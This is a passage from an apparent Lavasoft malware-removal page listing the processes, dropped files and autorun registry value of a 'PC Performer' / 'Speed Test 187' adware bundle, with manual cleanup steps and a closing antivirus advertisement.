    regsvr32.exe:1272
    regsvr32.exe:1432
    install_helper_IE.exe:604
    speedtest187.exe:356

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\settings.json (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\jquery-1.9.1.min.js (6984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.ico (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\install.rdf (987 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\options.xul (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\rjs.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.ico (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.ico (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.png (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\skin\framework.css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\config.js (205 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\subscriptloader.js (547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\content.js (66 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\icon.png (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.js (491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.js (1256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.xul (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\background.html (118 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.png (973 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome.manifest (320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.ico (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.png (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.xml (1 bytes)
    %Program Files%\PC Performer\is-TI75V.tmp (673 bytes)
    %Program Files%\PC Performer\unins000.dat (9720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\PC Performer\is-FK08C.tmp (32429 bytes)
    %Program Files%\PC Performer\is-LO644.tmp (601 bytes)
    %Program Files%\PC Performer\is-0MQOJ.tmp (601 bytes)
    %System%\roboot.exe (17 bytes)
    %Program Files%\PC Performer\is-88KFP.tmp (10177 bytes)
    %Program Files%\PC Performer\is-OR8M6.tmp (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\PC Performer\Uninstall PC Performer.lnk (722 bytes)
    %Program Files%\PC Performer\is-RFK2G.tmp (601 bytes)
    %Program Files%\PC Performer\is-J0TH5.tmp (673 bytes)
    %Program Files%\PC Performer\is-CLLEA.tmp (601 bytes)
    %Program Files%\PC Performer\is-DRJ95.tmp (673 bytes)
    %Program Files%\PC Performer\is-US574.tmp (601 bytes)
    %Program Files%\PC Performer\is-ET5QL.tmp (601 bytes)
    %Program Files%\PC Performer\is-E9OU8.tmp (54184 bytes)
    %Program Files%\PC Performer\is-KJP91.tmp (601 bytes)
    %Program Files%\PC Performer\is-LDHVJ.tmp (601 bytes)
    %Program Files%\PC Performer\is-6F8RF.tmp (46 bytes)
    %Program Files%\PC Performer\is-UQFA0.tmp (601 bytes)
    %Program Files%\PC Performer\is-EIDVD.tmp (601 bytes)
    %Program Files%\PC Performer\is-R0INF.tmp (45 bytes)
    %Program Files%\PC Performer\is-JH9KP.tmp (601 bytes)
    %Documents and Settings%\All Users\Desktop\PC Performer.lnk (725 bytes)
    %Program Files%\PC Performer\unins000.msg (302 bytes)
    %Program Files%\PC Performer\is-O468T.tmp (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\PC Performer\PC Performer.lnk (737 bytes)
    %Program Files%\PC Performer\is-5Q9FR.tmp (601 bytes)
    %Program Files%\PC Performer\is-T36CQ.tmp (601 bytes)
    %Program Files%\PC Performer\is-0S898.tmp (601 bytes)
    %Program Files%\PC Performer\is-QUT18.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\roboot.exe (17 bytes)
    %Program Files%\PC Performer\is-UG752.tmp (57 bytes)
    %Program Files%\PC Performer\is-3J2TL.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll (2218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\StdUtils.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\speedtest187Setup[1].exe (122458 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\PCPerformerSetup.exe (201724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\PCPerformerSetup_genericv3[1].exe (201724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\country[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    C:\END (156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\domain.txt (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\country.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\SpeedTest.exe (122458 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp\PCPerformerSetup.tmp (7386 bytes)
    %WinDir%\Tasks\PC Performer_UPDATES.job (268 bytes)
    %WinDir%\Tasks\PC Performer_DEFAULT.job (260 bytes)
    %Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\log_08-09-2014.log (8116 bytes)
    %Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\eng_rcp.dat (3172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\bin\DeskTopIcon.ico (16 bytes)
    %Program Files%\Speed Test 187\speedtest187.ico (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.exe (71964 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.xpi (9544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\DeskTopIcon.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper.exe (53430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_FF.exe (6841 bytes)
    %Documents and Settings%\%current user%\Desktop\Speed Test.lnk (1 bytes)
    %Program Files%\Speed Test 187\uninstall_nsis.exe (740 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.crx (8658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_IE.exe (6841 bytes)
    %Program Files%\Speed Test 187\config.xml (1 bytes)
    %Program Files%\Speed Test 187\icon32.png (3 bytes)
    %Program Files%\Speed Test 187\AddonsFramework.Typelib64.dll (548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\UAC.dll (13 bytes)
    %Program Files%\Speed Test 187\options.htm (780 bytes)
    %Program Files%\Speed Test 187\icon24.png (2 bytes)
    %Program Files%\Speed Test 187\icon48.ico (25 bytes)
    %Program Files%\Speed Test 187\ButtonSite.dll (7938 bytes)
    %Program Files%\Speed Test 187\json2.min.js (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\ie9install.bmp (2712 bytes)
    %Program Files%\Speed Test 187\content.js (66 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\help_page.ini (1537 bytes)
    %Program Files%\Speed Test 187\jquery-1.9.1.min.js (2410 bytes)
    %Program Files%\Speed Test 187\icon24.ico (2 bytes)
    %Program Files%\Speed Test 187\icon16.png (1 bytes)
    %Program Files%\Speed Test 187\icon64.ico (25 bytes)
    %Program Files%\Speed Test 187\background.html (939 bytes)
    %Program Files%\Speed Test 187\uninstall.exe (794 bytes)
    %Program Files%\Speed Test 187\icon32.ico (10 bytes)
    %Program Files%\Speed Test 187\icon16.ico (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\System.dll (11 bytes)
    %Program Files%\Speed Test 187\icon128.png (647 bytes)
    %Program Files%\Speed Test 187\icon128.ico (25 bytes)
    %Program Files%\Speed Test 187\ButtonSite64.dll (10790 bytes)
    %Program Files%\Speed Test 187\updater.js (3 bytes)
    %Program Files%\Speed Test 187\AddonsFramework.Typelib.dll (2128 bytes)
    %Program Files%\Speed Test 187\BackgroundHost.exe (15235 bytes)
    %Program Files%\Speed Test 187\BackgroundHost64.exe (15445 bytes)
    %Program Files%\Speed Test 187\icon18.png (1 bytes)
    %Program Files%\Speed Test 187\rjs.js (1 bytes)
    %Program Files%\Speed Test 187\icon64.png (7 bytes)
    %Program Files%\Speed Test 187\ScriptHost64.dll (10843 bytes)
    %Program Files%\Speed Test 187\button.js (491 bytes)
    %Program Files%\Speed Test 187\icon48.png (5 bytes)
    %Program Files%\Speed Test 187\ScriptHost.dll (9711 bytes)
    %Program Files%\Speed Test 187\updaterWrapper.js (2 bytes)
    %Program Files%\Speed Test 187\icon18.ico (2 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "RDReminder" = "%Program Files%\PC Performer\PCPerformer.exe -rem"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now